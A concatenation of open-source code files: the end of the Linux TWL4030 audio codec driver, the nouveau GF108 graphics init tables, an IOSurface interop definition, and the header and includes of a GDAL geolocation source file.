Mixer"}, /* CarkitR */ {"CarkitR Mixer", "Voice", "Analog Voice Playback Mixer"}, {"CarkitR Mixer", "AudioR1", "Analog R1 Playback Mixer"}, {"CarkitR Mixer", "AudioR2", "Analog R2 Playback Mixer"}, {"CarkitR PGA", NULL, "CarkitR Mixer"}, /* HandsfreeL */ {"HandsfreeL Mux", "Voice", "Analog Voice Playback Mixer"}, {"HandsfreeL Mux", "AudioL1", "Analog L1 Playback Mixer"}, {"HandsfreeL Mux", "AudioL2", "Analog L2 Playback Mixer"}, {"HandsfreeL Mux", "AudioR2", "Analog R2 Playback Mixer"}, {"HandsfreeL", "Switch", "HandsfreeL Mux"}, {"HandsfreeL PGA", NULL, "HandsfreeL"}, /* HandsfreeR */ {"HandsfreeR Mux", "Voice", "Analog Voice Playback Mixer"}, {"HandsfreeR Mux", "AudioR1", "Analog R1 Playback Mixer"}, {"HandsfreeR Mux", "AudioR2", "Analog R2 Playback Mixer"}, {"HandsfreeR Mux", "AudioL2", "Analog L2 Playback Mixer"}, {"HandsfreeR", "Switch", "HandsfreeR Mux"}, {"HandsfreeR PGA", NULL, "HandsfreeR"}, /* Vibra */ {"Vibra Mux", "AudioL1", "DAC Left1"}, {"Vibra Mux", "AudioR1", "DAC Right1"}, {"Vibra Mux", "AudioL2", "DAC Left2"}, {"Vibra Mux", 
"AudioR2", "DAC Right2"}, /* outputs */ /* Must be always connected (for AIF and APLL) */ {"Virtual HiFi OUT", NULL, "DAC Left1"}, {"Virtual HiFi OUT", NULL, "DAC Right1"}, {"Virtual HiFi OUT", NULL, "DAC Left2"}, {"Virtual HiFi OUT", NULL, "DAC Right2"}, /* Must be always connected (for APLL) */ {"Virtual Voice OUT", NULL, "Digital Voice Playback Mixer"}, /* Physical outputs */ {"EARPIECE", NULL, "Earpiece PGA"}, {"PREDRIVEL", NULL, "PredriveL PGA"}, {"PREDRIVER", NULL, "PredriveR PGA"}, {"HSOL", NULL, "HeadsetL PGA"}, {"HSOR", NULL, "HeadsetR PGA"}, {"CARKITL", NULL, "CarkitL PGA"}, {"CARKITR", NULL, "CarkitR PGA"}, {"HFL", NULL, "HandsfreeL PGA"}, {"HFR", NULL, "HandsfreeR PGA"}, {"Vibra Route", "Audio", "Vibra Mux"}, {"VIBRA", NULL, "Vibra Route"}, /* Capture path */ /* Must be always connected (for AIF and APLL) */ {"ADC Virtual Left1", NULL, "Virtual HiFi IN"}, {"ADC Virtual Right1", NULL, "Virtual HiFi IN"}, {"ADC Virtual Left2", NULL, "Virtual HiFi IN"}, {"ADC Virtual Right2", NULL, "Virtual HiFi IN"}, /* Physical inputs */ {"Analog Left", "Main Mic Capture Switch", "MAINMIC"}, {"Analog Left", "Headset Mic Capture Switch", "HSMIC"}, {"Analog Left", "AUXL Capture Switch", "AUXL"}, {"Analog Left", "Carkit Mic Capture Switch", "CARKITMIC"}, {"Analog Right", "Sub Mic Capture Switch", "SUBMIC"}, {"Analog Right", "AUXR Capture Switch", "AUXR"}, {"ADC Physical Left", NULL, "Analog Left"}, {"ADC Physical Right", NULL, "Analog Right"}, {"Digimic0 Enable", NULL, "DIGIMIC0"}, {"Digimic1 Enable", NULL, "DIGIMIC1"}, {"DIGIMIC0", NULL, "micbias1 select"}, {"DIGIMIC1", NULL, "micbias2 select"}, /* TX1 Left capture path */ {"TX1 Capture Route", "Analog", "ADC Physical Left"}, {"TX1 Capture Route", "Digimic0", "Digimic0 Enable"}, /* TX1 Right capture path */ {"TX1 Capture Route", "Analog", "ADC Physical Right"}, {"TX1 Capture Route", "Digimic0", "Digimic0 Enable"}, /* TX2 Left capture path */ {"TX2 Capture Route", "Analog", "ADC Physical Left"}, {"TX2 Capture Route", 
"Digimic1", "Digimic1 Enable"}, /* TX2 Right capture path */ {"TX2 Capture Route", "Analog", "ADC Physical Right"}, {"TX2 Capture Route", "Digimic1", "Digimic1 Enable"}, {"ADC Virtual Left1", NULL, "TX1 Capture Route"}, {"ADC Virtual Right1", NULL, "TX1 Capture Route"}, {"ADC Virtual Left2", NULL, "TX2 Capture Route"}, {"ADC Virtual Right2", NULL, "TX2 Capture Route"}, {"ADC Virtual Left1", NULL, "AIF Enable"}, {"ADC Virtual Right1", NULL, "AIF Enable"}, {"ADC Virtual Left2", NULL, "AIF Enable"}, {"ADC Virtual Right2", NULL, "AIF Enable"}, /* Analog bypass routes */ {"Right1 Analog Loopback", "Switch", "Analog Right"}, {"Left1 Analog Loopback", "Switch", "Analog Left"}, {"Right2 Analog Loopback", "Switch", "Analog Right"}, {"Left2 Analog Loopback", "Switch", "Analog Left"}, {"Voice Analog Loopback", "Switch", "Analog Left"}, /* Supply for the Analog loopbacks */ {"Right1 Analog Loopback", NULL, "FM Loop Enable"}, {"Left1 Analog Loopback", NULL, "FM Loop Enable"}, {"Right2 Analog Loopback", NULL, "FM Loop Enable"}, {"Left2 Analog Loopback", NULL, "FM Loop Enable"}, {"Voice Analog Loopback", NULL, "FM Loop Enable"}, {"Analog R1 Playback Mixer", NULL, "Right1 Analog Loopback"}, {"Analog L1 Playback Mixer", NULL, "Left1 Analog Loopback"}, {"Analog R2 Playback Mixer", NULL, "Right2 Analog Loopback"}, {"Analog L2 Playback Mixer", NULL, "Left2 Analog Loopback"}, {"Analog Voice Playback Mixer", NULL, "Voice Analog Loopback"}, /* Digital bypass routes */ {"Right Digital Loopback", "Volume", "TX1 Capture Route"}, {"Left Digital Loopback", "Volume", "TX1 Capture Route"}, {"Voice Digital Loopback", "Volume", "TX2 Capture Route"}, {"Digital R2 Playback Mixer", NULL, "Right Digital Loopback"}, {"Digital L2 Playback Mixer", NULL, "Left Digital Loopback"}, {"Digital Voice Playback Mixer", NULL, "Voice Digital Loopback"}, }; static int twl4030_set_bias_level(struct snd_soc_component *component, enum snd_soc_bias_level level) { switch (level) { case SND_SOC_BIAS_ON: break; case 
	 SND_SOC_BIAS_PREPARE:
		break;
	case SND_SOC_BIAS_STANDBY:
		/* Coming up from OFF: power the codec block back up */
		if (snd_soc_component_get_bias_level(component) == SND_SOC_BIAS_OFF)
			twl4030_codec_enable(component, 1);
		break;
	case SND_SOC_BIAS_OFF:
		twl4030_codec_enable(component, 0);
		break;
	}

	return 0;
}

/*
 * Constrain the not-yet-configured substream to the parameters of the
 * already-configured one: the codec shares a single rate/sample-size/channel
 * configuration between playback and capture.
 */
static void twl4030_constraints(struct twl4030_priv *twl4030,
				struct snd_pcm_substream *mst_substream)
{
	struct snd_pcm_substream *slv_substream;

	/* Pick the substream which still needs to be constrained */
	if (mst_substream == twl4030->master_substream)
		slv_substream = twl4030->slave_substream;
	else if (mst_substream == twl4030->slave_substream)
		slv_substream = twl4030->master_substream;
	else /* This should not happen.. */
		return;

	/* Set the constraints according to the already configured stream */
	snd_pcm_hw_constraint_single(slv_substream->runtime,
				     SNDRV_PCM_HW_PARAM_RATE,
				     twl4030->rate);
	snd_pcm_hw_constraint_single(slv_substream->runtime,
				     SNDRV_PCM_HW_PARAM_SAMPLE_BITS,
				     twl4030->sample_bits);
	snd_pcm_hw_constraint_single(slv_substream->runtime,
				     SNDRV_PCM_HW_PARAM_CHANNELS,
				     twl4030->channels);
}

/* In case of 4 channel mode, the RX1 L/R for playback and the TX2 L/R for
 * capture has to be enabled/disabled.
 */
static void twl4030_tdm_enable(struct snd_soc_component *component,
			       int direction, int enable)
{
	u8 reg, mask;

	reg = twl4030_read(component, TWL4030_REG_OPTION);

	/* RX1 L/R bits cover playback, TX2 L/R bits cover capture */
	if (direction == SNDRV_PCM_STREAM_PLAYBACK)
		mask = TWL4030_ARXL1_VRX_EN | TWL4030_ARXR1_EN;
	else
		mask = TWL4030_ATXL2_VTXL_EN | TWL4030_ATXR2_VTXR_EN;

	if (enable)
		reg |= mask;
	else
		reg &= ~mask;

	twl4030_write(component, TWL4030_REG_OPTION, reg);
}

static int twl4030_startup(struct snd_pcm_substream *substream,
			   struct snd_soc_dai *dai)
{
	struct snd_soc_component *component = dai->component;
	struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component);

	if (twl4030->master_substream) {
		/* Second stream to open becomes the slave */
		twl4030->slave_substream = substream;
		/* The DAI has one configuration for playback and capture, so
		 * if the DAI has been already configured then constrain this
		 * substream to match it. */
		if (twl4030->configured)
			twl4030_constraints(twl4030, twl4030->master_substream);
	} else {
		if (!(twl4030_read(component, TWL4030_REG_CODEC_MODE) &
		      TWL4030_OPTION_1)) {
			/* In option2 4 channel is not supported, set the
			 * constraint for the first stream for channels, the
			 * second stream will 'inherit' this constraint */
			snd_pcm_hw_constraint_single(substream->runtime,
						     SNDRV_PCM_HW_PARAM_CHANNELS,
						     2);
		}
		twl4030->master_substream = substream;
	}

	return 0;
}

static void twl4030_shutdown(struct snd_pcm_substream *substream,
			     struct snd_soc_dai *dai)
{
	struct snd_soc_component *component = dai->component;
	struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component);

	/* Promote the remaining open stream (if any) to master */
	if (twl4030->master_substream == substream)
		twl4030->master_substream = twl4030->slave_substream;

	twl4030->slave_substream = NULL;

	/* If all streams are closed, or the remaining stream has not yet
	 * been configured, then mark the DAI as not configured.
*/ if (!twl4030->master_substream) twl4030->configured = 0; else if (!twl4030->master_substream->runtime->channels) twl4030->configured = 0; /* If the closing substream had 4 channel, do the necessary cleanup */ if (substream->runtime->channels == 4) twl4030_tdm_enable(component, substream->stream, 0); } static int twl4030_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_params *params, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 mode, old_mode, format, old_format; /* If the substream has 4 channel, do the necessary setup */ if (params_channels(params) == 4) { format = twl4030_read(component, TWL4030_REG_AUDIO_IF); mode = twl4030_read(component, TWL4030_REG_CODEC_MODE); /* Safety check: are we in the correct operating mode and * the interface is in TDM mode? */ if ((mode & TWL4030_OPTION_1) && ((format & TWL4030_AIF_FORMAT) == TWL4030_AIF_FORMAT_TDM)) twl4030_tdm_enable(component, substream->stream, 1); else return -EINVAL; } if (twl4030->configured) /* Ignoring hw_params for already configured DAI */ return 0; /* bit rate */ old_mode = twl4030_read(component, TWL4030_REG_CODEC_MODE) & ~TWL4030_CODECPDZ; mode = old_mode & ~TWL4030_APLL_RATE; switch (params_rate(params)) { case 8000: mode |= TWL4030_APLL_RATE_8000; break; case 11025: mode |= TWL4030_APLL_RATE_11025; break; case 12000: mode |= TWL4030_APLL_RATE_12000; break; case 16000: mode |= TWL4030_APLL_RATE_16000; break; case 22050: mode |= TWL4030_APLL_RATE_22050; break; case 24000: mode |= TWL4030_APLL_RATE_24000; break; case 32000: mode |= TWL4030_APLL_RATE_32000; break; case 44100: mode |= TWL4030_APLL_RATE_44100; break; case 48000: mode |= TWL4030_APLL_RATE_48000; break; case 96000: mode |= TWL4030_APLL_RATE_96000; break; default: dev_err(component->dev, "%s: unknown rate %d\n", __func__, params_rate(params)); return -EINVAL; } /* sample size */ old_format = 
twl4030_read(component, TWL4030_REG_AUDIO_IF); format = old_format; format &= ~TWL4030_DATA_WIDTH; switch (params_width(params)) { case 16: format |= TWL4030_DATA_WIDTH_16S_16W; break; case 32: format |= TWL4030_DATA_WIDTH_32S_24W; break; default: dev_err(component->dev, "%s: unsupported bits/sample %d\n", __func__, params_width(params)); return -EINVAL; } if (format != old_format || mode != old_mode) { if (twl4030->codec_powered) { /* * If the codec is powered, than we need to toggle the * codec power. */ twl4030_codec_enable(component, 0); twl4030_write(component, TWL4030_REG_CODEC_MODE, mode); twl4030_write(component, TWL4030_REG_AUDIO_IF, format); twl4030_codec_enable(component, 1); } else { twl4030_write(component, TWL4030_REG_CODEC_MODE, mode); twl4030_write(component, TWL4030_REG_AUDIO_IF, format); } } /* Store the important parameters for the DAI configuration and set * the DAI as configured */ twl4030->configured = 1; twl4030->rate = params_rate(params); twl4030->sample_bits = hw_param_interval(params, SNDRV_PCM_HW_PARAM_SAMPLE_BITS)->min; twl4030->channels = params_channels(params); /* If both playback and capture streams are open, and one of them * is setting the hw parameters right now (since we are here), set * constraints to the other stream to match the current one. 
 */
	if (twl4030->slave_substream)
		twl4030_constraints(twl4030, substream);

	return 0;
}

static int twl4030_set_dai_sysclk(struct snd_soc_dai *codec_dai, int clk_id,
				  unsigned int freq, int dir)
{
	struct snd_soc_component *component = codec_dai->component;
	struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component);

	/* Only 19.2, 26.0 and 38.4 MHz HFCLKIN are accepted */
	switch (freq) {
	case 19200000:
	case 26000000:
	case 38400000:
		break;
	default:
		dev_err(component->dev, "Unsupported HFCLKIN: %u\n", freq);
		return -EINVAL;
	}

	/* twl4030->sysclk is kept in kHz; the requested rate must match it */
	if ((freq / 1000) != twl4030->sysclk) {
		dev_err(component->dev,
			"Mismatch in HFCLKIN: %u (configured: %u)\n",
			freq, twl4030->sysclk * 1000);
		return -EINVAL;
	}

	return 0;
}

static int twl4030_set_dai_fmt(struct snd_soc_dai *codec_dai,
			       unsigned int fmt)
{
	struct snd_soc_component *component = codec_dai->component;
	struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component);
	u8 old_format, format;

	/* get format */
	old_format = twl4030_read(component, TWL4030_REG_AUDIO_IF);
	format = old_format;

	/* set master/slave audio interface */
	switch (fmt & SND_SOC_DAIFMT_MASTER_MASK) {
	case SND_SOC_DAIFMT_CBM_CFM:
		/* codec is the bus master */
		format &= ~(TWL4030_AIF_SLAVE_EN);
		format &= ~(TWL4030_CLK256FS_EN);
		break;
	case SND_SOC_DAIFMT_CBS_CFS:
		/* codec is the bus slave */
		format |= TWL4030_AIF_SLAVE_EN;
		format |= TWL4030_CLK256FS_EN;
		break;
	default:
		return -EINVAL;
	}

	/* interface format */
	format &= ~TWL4030_AIF_FORMAT;
	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
	case SND_SOC_DAIFMT_I2S:
		format |= TWL4030_AIF_FORMAT_CODEC;
		break;
	case SND_SOC_DAIFMT_DSP_A:
		format |= TWL4030_AIF_FORMAT_TDM;
		break;
	default:
		return -EINVAL;
	}

	if (format != old_format) {
		if (twl4030->codec_powered) {
			/*
			 * If the codec is powered, then we need to toggle the
			 * codec power.
*/ twl4030_codec_enable(component, 0); twl4030_write(component, TWL4030_REG_AUDIO_IF, format); twl4030_codec_enable(component, 1); } else { twl4030_write(component, TWL4030_REG_AUDIO_IF, format); } } return 0; } static int twl4030_set_tristate(struct snd_soc_dai *dai, int tristate) { struct snd_soc_component *component = dai->component; u8 reg = twl4030_read(component, TWL4030_REG_AUDIO_IF); if (tristate) reg |= TWL4030_AIF_TRI_EN; else reg &= ~TWL4030_AIF_TRI_EN; return twl4030_write(component, TWL4030_REG_AUDIO_IF, reg); } /* In case of voice mode, the RX1 L(VRX) for downlink and the TX2 L/R * (VTXL, VTXR) for uplink has to be enabled/disabled. */ static void twl4030_voice_enable(struct snd_soc_component *component, int direction, int enable) { u8 reg, mask; reg = twl4030_read(component, TWL4030_REG_OPTION); if (direction == SNDRV_PCM_STREAM_PLAYBACK) mask = TWL4030_ARXL1_VRX_EN; else mask = TWL4030_ATXL2_VTXL_EN | TWL4030_ATXR2_VTXR_EN; if (enable) reg |= mask; else reg &= ~mask; twl4030_write(component, TWL4030_REG_OPTION, reg); } static int twl4030_voice_startup(struct snd_pcm_substream *substream, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 mode; /* If the system master clock is not 26MHz, the voice PCM interface is * not available. */ if (twl4030->sysclk != 26000) { dev_err(component->dev, "%s: HFCLKIN is %u KHz, voice interface needs 26MHz\n", __func__, twl4030->sysclk); return -EINVAL; } /* If the codec mode is not option2, the voice PCM interface is not * available. 
*/ mode = twl4030_read(component, TWL4030_REG_CODEC_MODE) & TWL4030_OPT_MODE; if (mode != TWL4030_OPTION_2) { dev_err(component->dev, "%s: the codec mode is not option2\n", __func__); return -EINVAL; } return 0; } static void twl4030_voice_shutdown(struct snd_pcm_substream *substream, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; /* Enable voice digital filters */ twl4030_voice_enable(component, substream->stream, 0); } static int twl4030_voice_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_params *params, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 old_mode, mode; /* Enable voice digital filters */ twl4030_voice_enable(component, substream->stream, 1); /* bit rate */ old_mode = twl4030_read(component, TWL4030_REG_CODEC_MODE) & ~TWL4030_CODECPDZ; mode = old_mode; switch (params_rate(params)) { case 8000: mode &= ~(TWL4030_SEL_16K); break; case 16000: mode |= TWL4030_SEL_16K; break; default: dev_err(component->dev, "%s: unknown rate %d\n", __func__, params_rate(params)); return -EINVAL; } if (mode != old_mode) { if (twl4030->codec_powered) { /* * If the codec is powered, than we need to toggle the * codec power. 
*/ twl4030_codec_enable(component, 0); twl4030_write(component, TWL4030_REG_CODEC_MODE, mode); twl4030_codec_enable(component, 1); } else { twl4030_write(component, TWL4030_REG_CODEC_MODE, mode); } } return 0; } static int twl4030_voice_set_dai_sysclk(struct snd_soc_dai *codec_dai, int clk_id, unsigned int freq, int dir) { struct snd_soc_component *component = codec_dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); if (freq != 26000000) { dev_err(component->dev, "%s: HFCLKIN is %u KHz, voice interface needs 26MHz\n", __func__, freq / 1000); return -EINVAL; } if ((freq / 1000) != twl4030->sysclk) { dev_err(component->dev, "Mismatch in HFCLKIN: %u (configured: %u)\n", freq, twl4030->sysclk * 1000); return -EINVAL; } return 0; } static int twl4030_voice_set_dai_fmt(struct snd_soc_dai *codec_dai, unsigned int fmt) { struct snd_soc_component *component = codec_dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 old_format, format; /* get format */ old_format = twl4030_read(component, TWL4030_REG_VOICE_IF); format = old_format; /* set master/slave audio interface */ switch (fmt & SND_SOC_DAIFMT_MASTER_MASK) { case SND_SOC_DAIFMT_CBM_CFM: format &= ~(TWL4030_VIF_SLAVE_EN); break; case SND_SOC_DAIFMT_CBS_CFS: format |= TWL4030_VIF_SLAVE_EN; break; default: return -EINVAL; } /* clock inversion */ switch (fmt & SND_SOC_DAIFMT_INV_MASK) { case SND_SOC_DAIFMT_IB_NF: format &= ~(TWL4030_VIF_FORMAT); break; case SND_SOC_DAIFMT_NB_IF: format |= TWL4030_VIF_FORMAT; break; default: return -EINVAL; } if (format != old_format) { if (twl4030->codec_powered) { /* * If the codec is powered, than we need to toggle the * codec power. 
*/ twl4030_codec_enable(component, 0); twl4030_write(component, TWL4030_REG_VOICE_IF, format); twl4030_codec_enable(component, 1); } else { twl4030_write(component, TWL4030_REG_VOICE_IF, format); } } return 0; } static int twl4030_voice_set_tristate(struct snd_soc_dai *dai, int tristate) { struct snd_soc_component *component = dai->component; u8 reg = twl4030_read(component, TWL4030_REG_VOICE_IF); if (tristate) reg |= TWL4030_VIF_TRI_EN; else reg &= ~TWL4030_VIF_TRI_EN; return twl4030_write(component, TWL4030_REG_VOICE_IF, reg); } #define TWL4030_RATES (SNDRV_PCM_RATE_8000_48000) #define TWL4030_FORMATS (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S32_LE) static const struct snd_soc_dai_ops twl4030_dai_hifi_ops = { .startup = twl4030_startup, .shutdown = twl4030_shutdown, .hw_params = twl4030_hw_params, .set_sysclk = twl4030_set_dai_sysclk, .set_fmt = twl4030_set_dai_fmt, .set_tristate = twl4030_set_tristate, }; static const struct snd_soc_dai_ops twl4030_dai_voice_ops = { .startup = twl4030_voice_startup, .shutdown = twl4030_voice_shutdown, .hw_params = twl4030_voice_hw_params, .set_sysclk = twl4030_voice_set_dai_sysclk, .set_fmt = twl4030_voice_set_dai_fmt, .set_tristate = twl4030_voice_set_tristate, }; static struct snd_soc_dai_driver twl4030_dai[] = { { .name = "twl4030-hifi", .playback = { .stream_name = "HiFi Playback", .channels_min = 2, .channels_max = 4, .rates = TWL4030_RATES | SNDRV_PCM_RATE_96000, .formats = TWL4030_FORMATS, .sig_bits = 24,}, .capture = { .stream_name = "HiFi Capture", .channels_min = 2, .channels_max = 4, .rates = TWL4030_RATES, .formats = TWL4030_FORMATS, .sig_bits = 24,}, .ops = &twl4030_dai_hifi_ops, }, { .name = "twl4030-voice", .playback = { .stream_name = "Voice Playback", .channels_min = 1, .channels_max = 1, .rates = SNDRV_PCM_RATE_8000 | SNDRV_PCM_RATE_16000, .formats = SNDRV_PCM_FMTBIT_S16_LE,}, .capture = { .stream_name = "Voice Capture", .channels_min = 1, .channels_max = 2, .rates = SNDRV_PCM_RATE_8000 | 
SNDRV_PCM_RATE_16000, .formats = SNDRV_PCM_FMTBIT_S16_LE,}, .ops = &twl4030_dai_voice_ops, }, }; static int twl4030_soc_probe(struct snd_soc_component *component) { struct twl4030_priv *twl4030; twl4030 = devm_kzalloc(component->dev, sizeof(struct twl4030_priv), GFP_KERNEL); if (!twl4030) return -ENOMEM; snd_soc_component_set_drvdata(component, twl4030); /* Set the defaults, and power up the codec */ twl4030->sysclk = twl4030_audio_get_mclk() / 1000; twl4030_init_chip(component); return 0; } static void twl4030_soc_remove(struct snd_soc_component *component) { struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); struct twl4030_codec_data *pdata = twl4030->pdata; if (pdata && pdata->hs_extmute && gpio_is_valid(pdata->hs_extmute_gpio)) gpio_free(pdata->hs_extmute_gpio); } static const struct snd_soc_component_driver soc_component_dev_twl4030 = { .probe = twl4030_soc_probe, .remove = twl4030_soc_remove, .read = twl4030_read, .write = twl4030_write, .set_bias_level = twl4030_set_bias_level, .controls = twl4030_snd_controls, .num_controls = ARRAY_SIZE(twl4030_snd_controls), .dapm_widgets = twl4030_dapm_widgets, .num_dapm_widgets = ARRAY_SIZE(twl4030_dapm_widgets), .dapm_routes = intercon, .num_dapm_routes = ARRAY_SIZE(intercon), .use_pmdown_time = 1, .endianness = 1, .non_legacy_dai_naming = 1, }; static int twl4030_codec_probe(struct platform_device *pdev) { return devm_snd_soc_register_component(&pdev->dev, &soc_component_dev_twl4030, twl4030_dai, ARRAY_SIZE(twl4030_dai)); } MODULE_ALIAS("platform:twl4030-codec"); static struct platform_driver twl4030_codec_driver = { .probe = twl4030_codec_probe, .driver = { .name = "twl4030-codec", }, }; module_platform_driver(twl4030_codec_driver); MODULE_DESCRIPTION("ASoC TWL4030 codec driver"); MODULE_AUTHOR("Steve Sakoman"); MODULE_LICENSE("GPL");
{ "pile_set_name": "Github" }
/*
 * Copyright 2013 Red Hat Inc.
 *
 * Permission is hereby granted, free of charge, to any person obtaining a
 * copy of this software and associated documentation files (the "Software"),
 * to deal in the Software without restriction, including without limitation
 * the rights to use, copy, modify, merge, publish, distribute, sublicense,
 * and/or sell copies of the Software, and to permit persons to whom the
 * Software is furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR
 * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
 * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
 * OTHER DEALINGS IN THE SOFTWARE.
 *
 * Authors: Ben Skeggs <[email protected]>
 */
#include "gf100.h"
#include "ctxgf100.h"

#include <nvif/class.h>

/*******************************************************************************
 * PGRAPH register lists
 *
 * GF108 (Fermi) graphics engine initialisation tables.  Each entry appears
 * to describe a run of MMIO registers to program: { address, count, stride,
 * value } per struct gf100_gr_init (field meaning assumed from usage here —
 * confirm against gf100.h).  A trailing {} entry terminates each list.
 * Tables not specific to GF108 are reused from gf100/gf104 (see the pack
 * list below).
 ******************************************************************************/

/* GPC setup registers specific to GF108; exported for reuse by later chips. */
const struct gf100_gr_init
gf108_gr_init_gpc_unk_0[] = {
	{ 0x418604,   1, 0x04, 0x00000000 },
	{ 0x418680,   1, 0x04, 0x00000000 },
	{ 0x418714,   1, 0x04, 0x00000000 },
	{ 0x418384,   1, 0x04, 0x00000000 },
	{}
};

/* Second-stage setup values; exported for reuse by later chips. */
const struct gf100_gr_init
gf108_gr_init_setup_1[] = {
	{ 0x4188c8,   2, 0x04, 0x00000000 },
	{ 0x4188d0,   1, 0x04, 0x00010000 },
	{ 0x4188d4,   1, 0x04, 0x00000001 },
	{}
};

/* Additional GPC registers; only referenced from this file. */
static const struct gf100_gr_init
gf108_gr_init_gpc_unk_1[] = {
	{ 0x418d00,   1, 0x04, 0x00000000 },
	{ 0x418f08,   1, 0x04, 0x00000000 },
	{ 0x418e00,   1, 0x04, 0x00000003 },
	{ 0x418e08,   1, 0x04, 0x00000000 },
	{}
};

/* Per-TPC PE (primitive engine) registers; only referenced from this file. */
static const struct gf100_gr_init
gf108_gr_init_pe_0[] = {
	{ 0x41980c,   1, 0x04, 0x00000010 },
	{ 0x419810,   1, 0x04, 0x00000000 },
	{ 0x419814,   1, 0x04, 0x00000004 },
	{ 0x419844,   1, 0x04, 0x00000000 },
	{ 0x41984c,   1, 0x04, 0x00005bc5 },
	{ 0x419850,   4, 0x04, 0x00000000 },
	{ 0x419880,   1, 0x04, 0x00000002 },
	{}
};

/*
 * Complete ordered MMIO init sequence for GF108: mostly the generic gf100
 * tables, with gf104 variants for ds/tex/sm and the four GF108-specific
 * tables defined above.
 */
static const struct gf100_gr_pack
gf108_gr_pack_mmio[] = {
	{ gf100_gr_init_main_0 },
	{ gf100_gr_init_fe_0 },
	{ gf100_gr_init_pri_0 },
	{ gf100_gr_init_rstr2d_0 },
	{ gf100_gr_init_pd_0 },
	{ gf104_gr_init_ds_0 },
	{ gf100_gr_init_scc_0 },
	{ gf100_gr_init_prop_0 },
	{ gf108_gr_init_gpc_unk_0 },
	{ gf100_gr_init_setup_0 },
	{ gf100_gr_init_crstr_0 },
	{ gf108_gr_init_setup_1 },
	{ gf100_gr_init_zcull_0 },
	{ gf100_gr_init_gpm_0 },
	{ gf108_gr_init_gpc_unk_1 },
	{ gf100_gr_init_gcc_0 },
	{ gf100_gr_init_tpccs_0 },
	{ gf104_gr_init_tex_0 },
	{ gf108_gr_init_pe_0 },
	{ gf100_gr_init_l1c_0 },
	{ gf100_gr_init_wwdx_0 },
	{ gf100_gr_init_tpccs_1 },
	{ gf100_gr_init_mpc_0 },
	{ gf104_gr_init_sm_0 },
	{ gf100_gr_init_be_0 },
	{ gf100_gr_init_fe_1 },
	{}
};

/*******************************************************************************
 * PGRAPH engine/subdev functions
 ******************************************************************************/

/*
 * GF108 PGRAPH description: generic gf100 init/firmware/ROP handling, the
 * GF108 MMIO pack list and context template, and the object classes exposed
 * to userspace (2D, M2MF, Fermi A/B 3D, compute).
 */
static const struct gf100_gr_func
gf108_gr = {
	.init = gf100_gr_init,
	.mmio = gf108_gr_pack_mmio,
	.fecs.ucode = &gf100_gr_fecs_ucode,
	.gpccs.ucode = &gf100_gr_gpccs_ucode,
	.rops = gf100_gr_rops,
	.grctx = &gf108_grctx,
	.sclass = {
		{ -1, -1, FERMI_TWOD_A },
		{ -1, -1, FERMI_MEMORY_TO_MEMORY_FORMAT_A },
		{ -1, -1, FERMI_A, &gf100_fermi },
		{ -1, -1, FERMI_B, &gf100_fermi },
		{ -1, -1, FERMI_COMPUTE_A },
		{}
	}
};

/* Instantiate the GF108 graphics engine via the common gf100 constructor. */
int
gf108_gr_new(struct nvkm_device *device, int index, struct nvkm_gr **pgr)
{
	return gf100_gr_new_(&gf108_gr, device, index, pgr);
}
{ "pile_set_name": "Github" }
depends = CFNetwork CoreFoundation Foundation Security darwin posix language = Objective-C package = platform.IOSurface modules = IOSurface compilerOpts = -framework IOSurface linkerOpts = -framework IOSurface
{ "pile_set_name": "Github" }
/******************************************************************************
 *
 * Project:  GDAL
 * Purpose:  Algorithm to apply a transformer to geolocation style bands.
 * Author:   Frank Warmerdam, [email protected]
 *
 ******************************************************************************
 * Copyright (c) 2012, Frank Warmerdam
 *
 * Permission is hereby granted, free of charge, to any person obtaining a
 * copy of this software and associated documentation files (the "Software"),
 * to deal in the Software without restriction, including without limitation
 * the rights to use, copy, modify, merge, publish, distribute, sublicense,
 * and/or sell copies of the Software, and to permit persons to whom the
 * Software is furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included
 * in all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
 * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
 * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
 * DEALINGS IN THE SOFTWARE.
 ****************************************************************************/

#include "cpl_port.h"
#include "gdal_alg.h"

#include <cstring>

#include "cpl_conv.h"
#include "cpl_error.h"
#include "cpl_progress.h"
#include "gdal.h"
